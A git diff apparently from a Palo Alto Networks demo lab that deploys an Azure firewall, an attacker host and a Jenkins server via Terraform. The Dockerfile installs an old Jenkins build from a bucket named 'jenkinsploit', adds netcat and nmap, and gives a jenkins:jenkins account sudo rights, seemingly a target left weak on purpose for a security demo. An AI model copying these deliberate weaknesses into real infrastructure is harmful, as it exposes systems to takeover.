outputs['Resource_Group']['value'] + bootstrap_bucket = outputs['Bootstrap_Bucket']['value'] + storage_account_access_key = outputs['Storage_Account_Access_Key']['value'] + update_status('web_in_bootstrap_status', 'success') + else: + logger.info("WebInBootstrap failed") + update_status('web_in_bootstap_status', 'error') + print(json.dumps(status_output)) + exit(1) + + + share_name = create_azure_fileshare(share_prefix, bootstrap_bucket, storage_account_access_key) + + WebInDeploy_vars.update({'Storage_Account_Access_Key': storage_account_access_key}) + WebInDeploy_vars.update({'Bootstrap_Storage_Account': bootstrap_bucket}) + WebInDeploy_vars.update({'RG_Name': resource_group}) + WebInDeploy_vars.update({'Attack_RG_Name': resource_group}) + WebInDeploy_vars.update({'Storage_Account_Fileshare': share_name}) + + # + # Build Infrastructure + # + # + + + return_code, web_in_deploy_output = apply_tf('./WebInDeploy', WebInDeploy_vars, 'WebInDeploy') + + logger.debug('Got Return code for deploy WebInDeploy {}'.format(return_code)) + + + update_status('web_in_deploy_output', web_in_deploy_output) + if return_code == 0: + update_status('web_in_deploy_status', 'success') + albDns = web_in_deploy_output['ALB-DNS']['value'] + fwMgt = web_in_deploy_output['MGT-IP-FW-1']['value'] + nlbDns = 
web_in_deploy_output['NLB-DNS']['value'] + fwMgtIP = web_in_deploy_output['MGT-IP-FW-1']['value'] + + logger.info("Got these values from output of WebInDeploy \n\n") + logger.info("AppGateway address is {}".format(albDns)) + logger.info("Internal loadbalancer address is {}".format(nlbDns)) + logger.info("Firewall Mgt address is {}".format(fwMgt)) + + else: + logger.info("WebInDeploy failed") + update_status('web_in_deploy_status', 'error') + print(json.dumps(status_output)) + exit(1) + + # + # Check firewall is up and running + # + # + + api_key = getApiKey(fwMgtIP, username, password) + + while True: + err = getFirewallStatus(fwMgtIP, api_key) + if err == 'cmd_error': + logger.info("Command error from fw ") + + elif err == 'no': + logger.info("FW is not up...yet") + # print("FW is not up...yet") + time.sleep(60) + continue + + elif err == 'almost': + logger.info("MGT up waiting for dataplane") + time.sleep(20) + continue + + elif err == 'yes': + logger.info("FW is up") + break + + logger.debug('Giving the FW another 10 seconds to fully come up to avoid race conditions') + time.sleep(10) + fw = firewall.Firewall(hostname=fwMgtIP, api_username=username, api_password=password) + + + logger.info("Updating firewall with latest content pack") + update_fw(fwMgtIP, api_key) + + # + # Configure Firewall + # + WebInFWConf_vars.update({'FW_Mgmt_IP': fwMgtIP}) + + logger.info("Applying addtional config to firewall") + + return_code, web_in_fw_conf_out = apply_tf('./WebInFWConf', WebInFWConf_vars, 'WebInFWConf') + + if return_code == 0: + update_status('web_in_fw_conf', 'success') + logger.info("WebInFWConf ok") + + else: + logger.info("WebInFWConf sent return code {}".format(return_code)) + update_status('web_in_deploy_status', 'error') + print(json.dumps(status_output)) + exit(1) + + logger.info("Commit changes to firewall") + + fw.commit() + logger.info("waiting for commit") + time.sleep(60) + logger.info("waiting for commit") + + # + # Check Jenkins + # + + logger.info('Checking if Jenkins Server is ready') + + res = getServerStatus(albDns) + + if res == 'server_up': + logger.info('Jenkins Server is ready') + logger.info('\n\n ### Deployment Complete ###') + logger.info('\n\n Connect to Jenkins Server at http://{}'.format(albDns)) + else: + logger.info('Jenkins Server is down') + logger.info('\n\n ### Deployment Complete ###') + + # dump out status to stdout + print(json.dumps(status_output)) + + +if __name__ == '__main__': + parser = argparse.ArgumentParser(description='Get Terraform Params') + parser.add_argument('-u', '--username', help='Firewall Username', required=True) + parser.add_argument('-p', '--password', help='Firewall Password', required=True) + parser.add_argument('-r', '--resource_group', help='Resource Group', required=True) + parser.add_argument('-j', '--azure_region', help='Azure Region', required=True) + + args = parser.parse_args() + username = args.username + password = args.password + resource_group = args.resource_group + azure_region = args.azure_region + + main(username, password, resource_group, azure_region) diff --git a/azure/Jenkins_proj-working/deployment_status.json b/azure/Jenkins_proj-working/deployment_status.json new file mode 100644 index 00000000..96c9a020 --- /dev/null +++ b/azure/Jenkins_proj-working/deployment_status.json @@ -0,0 +1 @@ +{"web_in_bootstrap_status": "success", "web_in_deploy_output": {"ALB-DNS": {"sensitive": false, "type": "string", "value": "with-ngfw-d89a.centralus.cloudapp.azure.com"}, "ATTACKER_IP": {"sensitive": false, "type": "string", 
"value": "52.165.238.28"}, "Attacker_RG_Name": {"sensitive": false, "type": "string", "value": "pglynn-sf-2e37-7250"}, "MGT-IP-FW-1": {"sensitive": false, "type": "string", "value": "52.165.238.25"}, "NATIVE-DNS": {"sensitive": false, "type": "string", "value": "sans-ngfw-d89a.centralus.cloudapp.azure.com"}, "NLB-DNS": {"sensitive": false, "type": "string", "value": "10.0.4.10"}, "RG_Name": {"sensitive": false, "type": "string", "value": "pglynn-sf-2e37"}}, "web_in_deploy_status": "success", "web_in_fw_conf": "success"} \ No newline at end of file diff --git a/azure/Jenkins_proj-working/deployold.py b/azure/Jenkins_proj-working/deployold.py new file mode 100644 index 00000000..b2ddb37e --- /dev/null +++ b/azure/Jenkins_proj-working/deployold.py @@ -0,0 +1,628 @@ +#!/usr/bin/env python3 +""" +# Copyright (c) 2018, Palo Alto Networks +# +# Permission to use, copy, modify, and/or distribute this software for any +# purpose with or without fee is hereby granted, provided that the above +# copyright notice and this permission notice appear in all copies. +# +# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES +# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF +# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR +# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES +# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN +# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF +# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. + +# Author: Justin Harris jharris@paloaltonetworks.com + +Usage + +python deploy.py -u -p -r -j + +""" + +import argparse +import json +import logging +import os +import subprocess +import sys +import time +import uuid +import xml.etree.ElementTree as ET +import xmltodict + +import requests +import urllib3 +from azure.common import AzureException +from azure.storage.file import FileService +from pandevice import firewall +from python_terraform import Terraform +from collections import OrderedDict + +# from . import cache_utils +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +_archive_dir = './WebInDeploy/bootstrap' +_content_update_dir = './WebInDeploy/content_updates/' + +logging.basicConfig(level=logging.INFO) +logger = logging.getLogger() +handler = logging.StreamHandler() +formatter = logging.Formatter('%(levelname)-8s %(message)s') +handler.setFormatter(formatter) +logger.addHandler(handler) +logger.setLevel(logging.INFO) + +# global var to keep status output +status_output = dict() + + +def send_request(call): + + headers = {'Accept-Encoding' : 'None', + 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) ' + 'AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'} + + try: + r = requests.get(call, headers = headers, verify=False, timeout=5) + r.raise_for_status() + except requests.exceptions.HTTPError as errh: + ''' + Firewall may return 5xx error when rebooting. 
Need to handle a 5xx response + ''' + logger.debug("DeployRequestException Http Error:") + raise DeployRequestException("Http Error:") + except requests.exceptions.ConnectionError as errc: + logger.debug("DeployRequestException Connection Error:") + raise DeployRequestException("Connection Error") + except requests.exceptions.Timeout as errt: + logger.debug("DeployRequestException Timeout Error:") + raise DeployRequestException("Timeout Error") + except requests.exceptions.RequestException as err: + logger.debug("DeployRequestException RequestException Error:") + raise DeployRequestException("Request Error") + else: + return r + + +class DeployRequestException(Exception): + pass + + +def listRecursive (d, key): + for k, v in d.items (): + if isinstance (v, OrderedDict): + for found in listRecursive (v, key): + yield found + if k == key: + yield v + +def update_fw(fwMgtIP, api_key): + # # Download latest applications and threats + + type = "op" + cmd = "" + call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key) + getjobid =0 + jobid = '' + key ='job' + + # FIXME - Remove Duplicate code for parsing jobid + + while getjobid == 0: + try: + r = send_request(call) + logger.info('Got response {} to request for content upgrade '.format(r.text)) + except: + DeployRequestException + logger.info("Didn't get http 200 response. Try again") + else: + try: + dict = xmltodict.parse(r.text) + if isinstance(dict, OrderedDict): + for found in listRecursive(dict, 'job'): + jobid = found + except Exception as err: + logger.info("Got exception {} trying to parse jobid from Dict".format(err)) + if not jobid: + logger.info('Got http 200 response but didnt get jobid') + time.sleep(30) + else: + getjobid = 1 + + # FIXME - Remove Duplicate code for showing job status + + completed = 0 + while (completed == 0): + time.sleep(30) + call = "https://%s/api/?type=op&cmd=%s&key=%s" % (fwMgtIP, jobid, api_key) + try: + r = send_request(call) + logger.info('Got Response {} to show jobs '.format(r.text)) + except: + DeployRequestException + logger.debug("failed to get jobid this time. Try again") + else: + tree = ET.fromstring(r.text) + if tree.attrib['status'] == 'success': + try: + if (tree[0][0][5].text == 'FIN'): + logger.debug("APP+TP download Complete " ) + completed = 1 + print("Download latest Applications and Threats update") + status = "APP+TP download Status - " + str(tree[0][0][5].text) + " " + str( + tree[0][0][12].text) + "% complete" + print('{0}\r'.format(status)) + except: + logger.info('Could not parse output from show jobs, with jobid {}'.format(jobid)) + else: + logger.info('Unable to determine job status') + + + # install latest anti-virus update without committing + getjobid =0 + jobid = '' + key ='job' + while getjobid == 0: + try: + + type = "op" + cmd = "latestno" + call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key) + r = send_request(call) + logger.info('Got response to request AV install {}'.format(r.text)) + except: + DeployRequestException + logger.info("Didn't get http 200 response. 
Try again") + else: + try: + dict = xmltodict.parse(r.text) + if isinstance(dict, OrderedDict): + for found in listRecursive(dict, 'job'): + jobid = found + except Exception as err: + logger.info("Got exception {} trying to parse jobid from Dict".format(err)) + if not jobid: + logger.info('Got http 200 response but didnt get jobid') + time.sleep(30) + else: + getjobid = 1 + + completed = 0 + while (completed == 0): + time.sleep(30) + call = "https://%s/api/?type=op&cmd=%s&key=%s" % ( + fwMgtIP, jobid, api_key) + r = send_request(call) + tree = ET.fromstring(r.text) + + logger.debug('Got response for show job {}'.format(r.text)) + if tree.attrib['status'] == 'success': + try: + if (tree[0][0][5].text == 'FIN'): + logger.debug("AV install Status Complete ") + completed = 1 + else: + status = "Status - " + str(tree[0][0][5].text) + " " + str(tree[0][0][12].text) + "% complete" + print('{0}\r'.format(status)) + except: + logger.info('Could not parse output from show jobs, with jobid {}'.format(jobid)) + + else: + logger.info('Unable to determine job status') + + +def getApiKey(hostname, username, password): + ''' + Generate the API key from username / password + ''' + + call = "https://%s/api/?type=keygen&user=%s&password=%s" % (hostname, username, password) + + api_key = "" + while True: + try: + # response = urllib.request.urlopen(url, data=encoded_data, context=ctx).read() + response = send_request(call) + + + except DeployRequestException as updateerr: + logger.info("No response from FW. Wait 20 secs before retry") + time.sleep(10) + continue + + else: + api_key = ET.XML(response.content)[0][0].text + logger.info("FW Management plane is Responding so checking if Dataplane is ready") + logger.debug("Response to get_api is {}".format(response)) + return api_key + + +def getFirewallStatus(fwIP, api_key): + fwip = fwIP + + """ + Gets the firewall status by sending the API request show chassis status. + :param fwMgtIP: IP Address of firewall interface to be probed + :param api_key: Panos API key + """ + + url = "https://%s/api/?type=op&cmd=&key=%s" % (fwip, api_key) + # Send command to fw and see if it times out or we get a response + logger.info("Sending command 'show chassis status' to firewall") + try: + response = requests.get(url, verify=False, timeout=10) + response.raise_for_status() + except requests.exceptions.Timeout as fwdownerr: + logger.debug("No response from FW. So maybe not up!") + return 'no' + # sleep and check again? + except requests.exceptions.HTTPError as fwstartgerr: + ''' + Firewall may return 5xx error when rebooting. Need to handle a 5xx response + raise_for_status() throws HTTPError for error responses + ''' + logger.infor("Http Error: {}: ".format(fwstartgerr)) + return 'cmd_error' + except requests.exceptions.RequestException as err: + logger.debug("Got RequestException response from FW. So maybe not up!") + return 'cmd_error' + else: + logger.debug("Got response to 'show chassis status' {}".format(response)) + + resp_header = ET.fromstring(response.content) + logger.debug('Response header is {}'.format(resp_header)) + + if resp_header.tag != 'response': + logger.debug("Did not get a valid 'response' string...maybe a timeout") + return 'cmd_error' + + if resp_header.attrib['status'] == 'error': + logger.debug("Got an error for the command") + return 'cmd_error' + + if resp_header.attrib['status'] == 'success': + # The fw responded with a successful command execution. So is it ready? 
+ for element in resp_header: + if element.text.rstrip() == 'yes': + logger.info("FW Chassis is ready to accept configuration and connections") + return 'yes' + else: + logger.info("FW Chassis not ready, still waiting for dataplane") + time.sleep(10) + return 'almost' + + +def update_status(key, value): + global status_output + + if type(status_output) is not dict: + logger.info('Creating new status_output object') + status_output = dict() + + if key is not None and value is not None: + status_output[key] = value + + # write status to file to future tracking + write_status_file(status_output) + + +def write_status_file(message_dict): + """ + Writes the deployment state to a dict and outputs to file for status tracking + """ + try: + message_json = json.dumps(message_dict) + with open('deployment_status.json', 'w+') as dpj: + dpj.write(message_json) + + except ValueError as ve: + logger.error('Could not write status file!') + print('Could not write status file!') + sys.exit(1) + + +def create_azure_fileshare(share_prefix, account_name, account_key): + # generate a unique share name to avoid overlaps in shared infra + + # FIXME - Need to remove hardcoded directoty link below + + d_dir = './WebInDeploy/bootstrap' + share_name = "{0}-{1}".format(share_prefix.lower(), str(uuid.uuid4())) + print('using share_name of: {}'.format(share_name)) + + # archive_file_path = _create_archive_directory(files, share_prefix) + + try: + # ignore SSL warnings - bad form, but SSL Decrypt causes issues with this + s = requests.Session() + s.verify = False + + file_service = FileService(account_name=account_name, account_key=account_key, request_session=s) + + # print(file_service) + if not file_service.exists(share_name): + file_service.create_share(share_name) + + for d in ['config', 'content', 'software', 'license']: + print('creating directory of type: {}'.format(d)) + if not file_service.exists(share_name, directory_name=d): + file_service.create_directory(share_name, d) + + # FIXME - We only handle bootstrap files. 
May need to handle other dirs + + if d == 'config': + for filename in os.listdir(d_dir): + print('creating file: {0}'.format(filename)) + file_service.create_file_from_path(share_name, d, filename, os.path.join(d_dir, filename)) + + except AttributeError as ae: + # this can be returned on bad auth information + print(ae) + return "Authentication or other error creating bootstrap file_share in Azure" + + except AzureException as ahe: + print(ahe) + return str(ahe) + except ValueError as ve: + print(ve) + return str(ve) + + print('all done') + return share_name + + +def getServerStatus(IP): + """ + Gets the server status by sending an HTTP request and checking for a 200 response code + """ + global gcontext + + call = ("http://" + IP + "/") + logger.info('URL request is {}'.format(call)) + # Send command to fw and see if it times out or we get a response + count = 0 + max_count = 15 + while True: + if count < max_count: + try: + count = count + 1 + r = send_request(call) + except DeployRequestException as e: + logger.debug("Got Invalid response".format(e)) + else: + logger.info('Jenkins Server responded with HTTP 200 code') + return 'server_up' + else: + break + return 'server_down' + + +def main(username, password, rg_name, azure_region): + username = username + password = password + + WebInBootstrap_vars = { + 'RG_Name': rg_name, + 'Azure_Region': azure_region + } + + WebInDeploy_vars = { + 'Admin_Username': username, + 'Admin_Password': password, + 'Azure_Region': azure_region + } + + WebInFWConf_vars = { + 'Admin_Username': username, + 'Admin_Password': password + } + + # Set run_plan to TRUE is you wish to run terraform plan before apply + run_plan = False + kwargs = {"auto-approve": True} + + # Class Terraform uses subprocess and setting capture_output to True will capture output + capture_output = kwargs.pop('capture_output', False) + + if capture_output is True: + stderr = subprocess.PIPE + stdout = subprocess.PIPE + else: + # if capture output is False, then everything will essentially go to stdout and stderrf + stderr = sys.stderr + stdout = sys.stdout + start_time = time.asctime() + print(f'Starting Deployment at {start_time}\n') + + # Create Bootstrap + + tf = Terraform(working_dir='./WebInBootstrap') + + tf.cmd('init') + if run_plan: + # print('Calling tf.plan') + tf.plan(capture_output=False) + return_code1, stdout, stderr = tf.apply(vars=WebInBootstrap_vars, capture_output=capture_output, + skip_plan=True, **kwargs) + + resource_group = tf.output('Resource_Group') + bootstrap_bucket = tf.output('Bootstrap_Bucket') + storage_account_access_key = tf.output('Storage_Account_Access_Key') + web_in_bootstrap_output = tf.output() + + logger.debug('Got Return code for deploy WebInDeploy {}'.format(return_code1)) + + update_status('web_in_deploy_stdout', stdout) + update_status('web_in_bootstrap_output', web_in_bootstrap_output) + + if return_code1 != 0: + logger.info("WebInBootstrap failed") + update_status('web_in_bootstap_status', 'error') + update_status('web_in_bootstrap_stderr', stderr) + print(json.dumps(status_output)) + exit(1) + else: + update_status('web_in_bootstrap_status', 'success') + + share_prefix = 'jenkins-demo' + + share_name = create_azure_fileshare(share_prefix, bootstrap_bucket, storage_account_access_key) + + WebInDeploy_vars.update({'Storage_Account_Access_Key': storage_account_access_key}) + WebInDeploy_vars.update({'Bootstrap_Storage_Account': bootstrap_bucket}) + WebInDeploy_vars.update({'RG_Name': resource_group}) + 
WebInDeploy_vars.update({'Attack_RG_Name': resource_group}) + WebInDeploy_vars.update({'Storage_Account_Fileshare': share_name}) + + # Build Infrastructure + + tf = Terraform(working_dir='./WebInDeploy') + # print("vars {}".format(WebInDeploy_vars)) + tf.cmd('init') + if run_plan: + # print('Calling tf.plan') + tf.plan(capture_output=False, var=WebInDeploy_vars) + + return_code1, stdout, stderr = tf.apply(var=WebInDeploy_vars, capture_output=capture_output, skip_plan=True, + **kwargs) + + web_in_deploy_output = tf.output() + + logger.debug('Got Return code for deploy WebInDeploy {}'.format(return_code1)) + + update_status('web_in_deploy_stdout', stdout) + update_status('web_in_deploy_output', web_in_deploy_output) + if return_code1 != 0: + logger.info("WebInDeploy failed") + update_status('web_in_deploy_status', 'error') + update_status('web_in_deploy_stderr', stderr) + print(json.dumps(status_output)) + exit(1) + else: + update_status('web_in_deploy_status', 'success') + + albDns = tf.output('ALB-DNS') + fwMgt = tf.output('MGT-IP-FW-1') + nlbDns = tf.output('NLB-DNS') + fwMgtIP = tf.output('MGT-IP-FW-1') + + logger.info("Got these values from output \n\n") + logger.info("AppGateway address is {}".format(albDns)) + logger.info("Internal loadbalancer address is {}".format(nlbDns)) + logger.info("Firewall Mgt address is {}".format(fwMgt)) + + # + # Check firewall is up and running + # # + + api_key = getApiKey(fwMgtIP, username, password) + + while True: + err = getFirewallStatus(fwMgtIP, api_key) + if err == 'cmd_error': + logger.info("Command error from fw ") + + elif err == 'no': + logger.info("FW is not up...yet") + # print("FW is not up...yet") + time.sleep(60) + continue + + elif err == 'almost': + logger.info("MGT up waiting for dataplane") + time.sleep(20) + continue + + elif err == 'yes': + logger.info("FW is up") + break + + logger.debug('Giving the FW another 10 seconds to fully come up to avoid race conditions') + time.sleep(10) + fw = firewall.Firewall(hostname=fwMgtIP, api_username=username, api_password=password) + logger.info("Updating firewall with latest content pack") + + update_fw(fwMgtIP, api_key) + + # + # Configure Firewall + # + WebInFWConf_vars.update({'FW_Mgmt_IP': fwMgtIP}) + tf = Terraform(working_dir='./WebInFWConf') + tf.cmd('init') + kwargs = {"auto-approve": True} + + logger.info("Applying addtional config to firewall") + + WebInFWConf_vars['mgt-ipaddress-fw1'] = fwMgt + + if run_plan: + tf.plan(capture_output=capture_output, var=WebInFWConf_vars) + + # update initial vars with generated fwMgt ip + + return_code2, stdout, stderr = tf.apply(capture_output=capture_output, skip_plan=True, + var=WebInFWConf_vars, **kwargs) + + web_in_fw_conf_out = tf.output() + + update_status('web_in_fw_conf_output', web_in_fw_conf_out) + # update_status('web_in_fw_conf_stdout', stdout) + + logger.debug('Got Return code for deploy WebInFwConf {}'.format(return_code2)) + + if return_code2 != 0: + logger.error("WebInFWConf failed") + update_status('web_in_fw_conf_status', 'error') + update_status('web_in_fw_conf_stderr', stderr) + print(json.dumps(status_output)) + exit(1) + else: + update_status('web_in_fw_conf_status', 'success') + + logger.info("Commit changes to firewall") + + fw.commit() + logger.info("waiting for commit") + time.sleep(60) + logger.info("waiting for commit") + + # + # Check Jenkins + # + + logger.info('Checking if Jenkins Server is ready') + + # FIXME - add outputs for all 3 dirs + + res = getServerStatus(albDns) + + if res == 'server_up': + 
logger.info('Jenkins Server is ready') + logger.info('\n\n ### Deployment Complete ###') + logger.info('\n\n Connect to Jenkins Server at http://{}'.format(albDns)) + else: + logger.info('Jenkins Server is down') + logger.info('\n\n ### Deployment Complete ###') + + # dump out status to stdout + print(json.dumps(status_output)) + + +if __name__ == '__main__': + parser = argparse.ArgumentParser(description='Get Terraform Params') + parser.add_argument('-u', '--username', help='Firewall Username', required=True) + parser.add_argument('-p', '--password', help='Firewall Password', required=True) + parser.add_argument('-r', '--resource_group', help='Resource Group', required=True) + parser.add_argument('-j', '--azure_region', help='Azure Region', required=True) + + args = parser.parse_args() + username = args.username + password = args.password + resource_group = args.resource_group + azure_region = args.azure_region + + main(username, password, resource_group, azure_region) diff --git a/azure/Jenkins_proj-working/destroy-old.py b/azure/Jenkins_proj-working/destroy-old.py new file mode 100644 index 00000000..305e8925 --- /dev/null +++ b/azure/Jenkins_proj-working/destroy-old.py @@ -0,0 +1,121 @@ +#!/usr/bin/env python3 +""" +# Copyright (c) 2018, Palo Alto Networks +# +# Permission to use, copy, modify, and/or distribute this software for any +# purpose with or without fee is hereby granted, provided that the above +# copyright notice and this permission notice appear in all copies. +# +# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES +# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF +# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR +# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES +# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN +# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF +# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. 
+ +# Author: Justin Harris jharris@paloaltonetworks.com + +Usage: +git +python destroy.py + +""" + +import argparse +import logging + +from python_terraform import Terraform + +logger = logging.getLogger() +handler = logging.StreamHandler() +formatter = logging.Formatter('%(levelname)-8s %(message)s') +handler.setFormatter(formatter) +logger.addHandler(handler) +logger.setLevel(logging.INFO) + + +def main(username, password): + username = username + password = password + + WebInDeploy_vars = { + 'Admin_Username': username, + 'Admin_Password': password + } + + WebInBootstrap_vars = { + 'Admin_Username': username, + 'Admin_Password': password + } + + albDns = '' + nlbDns = '' + fwMgt = '' + + # Set run_plan to TRUE is you wish to run terraform plan before apply + run_plan = False + deployment_status = {} + kwargs = {"auto-approve": True} + + # + # Destroy Infrastructure + # + tf = Terraform(working_dir='./WebInDeploy') + rg_name = tf.output('RG_Name') + + attack_rg_name = tf.output('Attacker_RG_Name') + logger.info('Got RG_Name {} and Attacker_RG_Name {}'.format(rg_name, attack_rg_name)) + + WebInDeploy_vars.update({'RG_Name': rg_name}) + WebInDeploy_vars.update({'Attack_RG_Name': attack_rg_name}) + + if run_plan: + print('Calling tf.plan') + tf.plan(capture_output=False) + + return_code1, stdout, stderr = tf.cmd('destroy', var=WebInDeploy_vars, capture_output=False, **kwargs) + # return_code1 =0 + print('Got return code {}'.format(return_code1)) + + if return_code1 != 0: + logger.info("Failed to destroy build ") + + exit() + else: + + logger.info("Destroyed WebInDeploy ") + + WebInBootstrap_vars.update({'RG_Name': rg_name}) + WebInBootstrap_vars.update({'Attack_RG_Name': attack_rg_name}) + + tf = Terraform(working_dir='./WebInBootstrap') + + if run_plan: + print('Calling tf.plan') + tf.plan(capture_output=False) + + return_code1, stdout, stderr = tf.cmd('destroy', var=WebInBootstrap_vars, capture_output=False, **kwargs) + # return_code1 =0 + print('Got return code {}'.format(return_code1)) + + if return_code1 != 0: + logger.info("WebInBootstrap destroyed") + deployment_status = {'WebInDeploy': 'Fail'} + + exit() + else: + deployment_status = {'WebInDeploy': 'Success'} + exit() + + +if __name__ == '__main__': + parser = argparse.ArgumentParser(description='Get Terraform Params') + parser.add_argument('-u', '--username', help='Firewall Username', required=True) + parser.add_argument('-p', '--password', help='Firewall Password', required=True) + + args = parser.parse_args() + username = args.username + password = args.password + + main(username, password) diff --git a/azure/Jenkins_proj-working/destroy.py b/azure/Jenkins_proj-working/destroy.py new file mode 100644 index 00000000..3bc6b81b --- /dev/null +++ b/azure/Jenkins_proj-working/destroy.py @@ -0,0 +1,125 @@ + +from azure.cli.core import get_default_cli +import sys +import tempfile +import argparse +import logging +import subprocess +import os + +from python_terraform import Terraform + +logger = logging.getLogger() +# handler = logging.StreamHandler() +# formatter = logging.Formatter('%(levelname)-8s %(message)s') +# handler.setFormatter(formatter) +# logger.addHandler(handler) +logger.setLevel(logging.INFO) + + +# +# Usage azure_login.py -g rgname +# + +sys.sterr = sys.stdout + +print('Logging in to Azure using device code') + +def run_cmd(cmd): + subprocess.call('az login', shell=True) + res = subprocess.call(cmd, shell=True) + print ('Result is {}'.format(res)) + + +def delete_file(fpath): + if os.path.exists(fpath): + try: + 
os.remove(fpath) + print ('Removed state file {}'.format(fpath)) + except Exception as e: + print ('Unable to delete the file {} got error {}'.format(fpath, e)) + else: + print('No need to delete {} as it no longer exists'.format(fpath)) + +def az_cli(args_str): + temp = tempfile.TemporaryFile() + args = args_str.split() + logger.debug('Sending cli command {}'.format(args)) + code = get_default_cli().invoke(args, None, temp) + # temp.seek(0) + data = temp.read().strip() + temp.close() + return [code, data] + +def delete_rg(rg_name): + logger.info('Deleting resource group {}'.format(rg_name)) + cmd = 'group delete --name ' + rg_name + ' --yes' + code, data = az_cli(cmd) + if code == 0: + print ('Successfully deleted Rg {} {}'.format(code,rg_name)) + +def delete_state_files(working_dir, file_list): + """ + + :param working_dir: string + :param tfstate_files: list of files + :return: True or False + + Removes a list of files from a directory + + """ + for file_name in file_list: + fpath = working_dir + file_name + if os.path.exists(fpath): + delete_file(fpath) + else: + print('Already deleted file {}'.format(fpath)) + +def main (username, password): + #get_default_cli().invoke(['login', "--use-device-code"], out_file=sys.stdout) + # + # Destroy Infrastructure + # + tfstate_file = 'terraform.tfstate' + tfstate_files = ['terraform.tfstate', 'terraform.tfstate.backup'] + + fpath = './WebInDeploy/' + tfstate_file + if os.path.isfile(fpath): + tf = Terraform(working_dir='./WebInDeploy') + rg_name = tf.output('RG_Name') + rg_name1 = tf.output('Attacker_RG_Name') + delete_rg_cmd = 'group delete --name ' + rg_name + ' --yes' + az_cli(delete_rg_cmd) + # + # Delete state files WebInDeploy + # + delete_state_files('./WebInDeploy/', tfstate_files) + + + fpath = './WebInBootstrap/' + tfstate_file + if os.path.isfile(fpath): + delete_rg_cmd = 'group delete --name ' + rg_name1 + ' --yes' + az_cli(delete_rg_cmd) + # + # Delete state files WebInBootstrap + # + delete_state_files('./WebInBootstrap/', tfstate_files) + + + # + # Delete state files WebInFWConf + # + delete_state_files('./WebInFWConf/', tfstate_files) + + + + +if __name__ == '__main__': + parser = argparse.ArgumentParser(description='Get Terraform Params') + parser.add_argument('-u', '--username', help='Firewall Username', required=True) + parser.add_argument('-p', '--password', help='Firewall Password', required=True) + args = parser.parse_args() + username = args.username + password = args.password + # get_default_cli().invoke(['login', "--use-device-code"], out_file=sys.stdout) + main(username, password) diff --git a/azure/Jenkins_proj-working/jenkins/Dockerfile b/azure/Jenkins_proj-working/jenkins/Dockerfile new file mode 100644 index 00000000..1dea80e9 --- /dev/null +++ b/azure/Jenkins_proj-working/jenkins/Dockerfile @@ -0,0 +1,38 @@ +FROM openjdk:8-jdk + +MAINTAINER jamie-b + +RUN apt-get update && apt-get install -y git curl wget netcat nmap net-tools sudo && rm -rf /var/lib/apt/lists/* + + +ENV JENKINS_HOME /var/jenkins_home +ENV COPY_REFERENCE_FILE_LOG $JENKINS_HOME/copy_reference_file.log + +RUN groupadd -g 1000 jenkins \ + && useradd -d "$JENKINS_HOME" -u 1000 -g 1000 -m -s /bin/bash jenkins \ + && adduser jenkins sudo \ + && echo 'jenkins:jenkins' | chpasswd + +ENV TINI_VERSION v0.14.0 +ADD https://github.com/wwce/terraform/blob/master/azure/Jenkins_proj-master/jenkins/tini?raw=true /bin/tini +RUN chmod +x /bin/tini + +ENV JENKINS_VERSION 2.32.1 +RUN set -ex \ + && [ -e /usr/share/jenkins ] || mkdir -p /usr/share/jenkins \ + && [ -e 
/usr/share/jenkins/ref ] || mkdir -p /usr/share/jenkins/ref \ + && wget https://s3.amazonaws.com/jenkinsploit/jenkins-2-32.war -O /usr/share/jenkins/jenkins.war -q --progress=bar:force:noscroll --show-progress \ + && chown -R jenkins "$JENKINS_HOME" /usr/share/jenkins/ref + +EXPOSE 8080 +EXPOSE 50000 + +COPY jenkins.sh /usr/local/bin/jenkins.sh + +RUN chmod +x /usr/local/bin/jenkins.sh + +USER root + +ENTRYPOINT ["/bin/tini", "--"] + +CMD ["/usr/local/bin/jenkins.sh"] diff --git a/azure/Jenkins_proj-working/jenkins/config.xml b/azure/Jenkins_proj-working/jenkins/config.xml new file mode 100644 index 00000000..071c4fb7 --- /dev/null +++ b/azure/Jenkins_proj-working/jenkins/config.xml @@ -0,0 +1,35 @@ + + + admin admin + + + N2ooq1C0iCP+SERJA63imvGjKrB40ORk7hFGe9ItYuT0iVVj/0rJDQKpVBfS6PMq + + + + + + All + false + false + + + + + + default + + + + + + false + + + bcrypt:768e02f82c2e957c0aa638bbee6bcc49d5c7f1d8a67d1a838b0945ce144e6e46 + + + admin@admin.com + + + diff --git a/azure/Jenkins_proj-working/jenkins/docker-compose.yml b/azure/Jenkins_proj-working/jenkins/docker-compose.yml new file mode 100644 index 00000000..61334042 --- /dev/null +++ b/azure/Jenkins_proj-working/jenkins/docker-compose.yml @@ -0,0 +1,11 @@ +version: '3' +services: + jenkins: + build: . + container_name: jenkins + environment: + JAVA_OPTS: "-Djava.awt.headless=true" + JAVA_OPTS: "-Djenkins.install.runSetupWizard=false" + ports: + - "50000:50000" + - "8080:8080" diff --git 